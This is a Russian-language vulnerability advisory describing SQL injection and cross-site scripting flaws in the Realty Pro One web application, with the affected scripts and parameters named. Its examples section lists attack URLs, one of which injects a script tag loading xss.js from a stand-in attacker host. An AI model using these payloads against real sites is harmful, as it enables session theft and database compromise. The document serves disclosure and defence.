Программа: Realty Pro One
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.
1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "listingid" в "listings/" и "listings/index_other.php", в параметре "propertyid" в сценарии "search/searchlookup.php", и параметре "id" в сценарии "images.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "agentid" в сценарии "listings/request_info.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
http://www.example.com/listings/?listingid=<SCRIPT%20SRC =http://evilsite.com/xss.js></SCRIPT>
http://www.example.com/search/searchlookup.php?propertyid=200 or [XSS]
http://www.example.com/images.php?id=[XSS]
http://www.example.com/listings/index_other.php?listingid=[XSS]
http://www.example.com/listings/request_info.php?agentid=101005"> [XSS]<"&listtype=homes&listingid=222003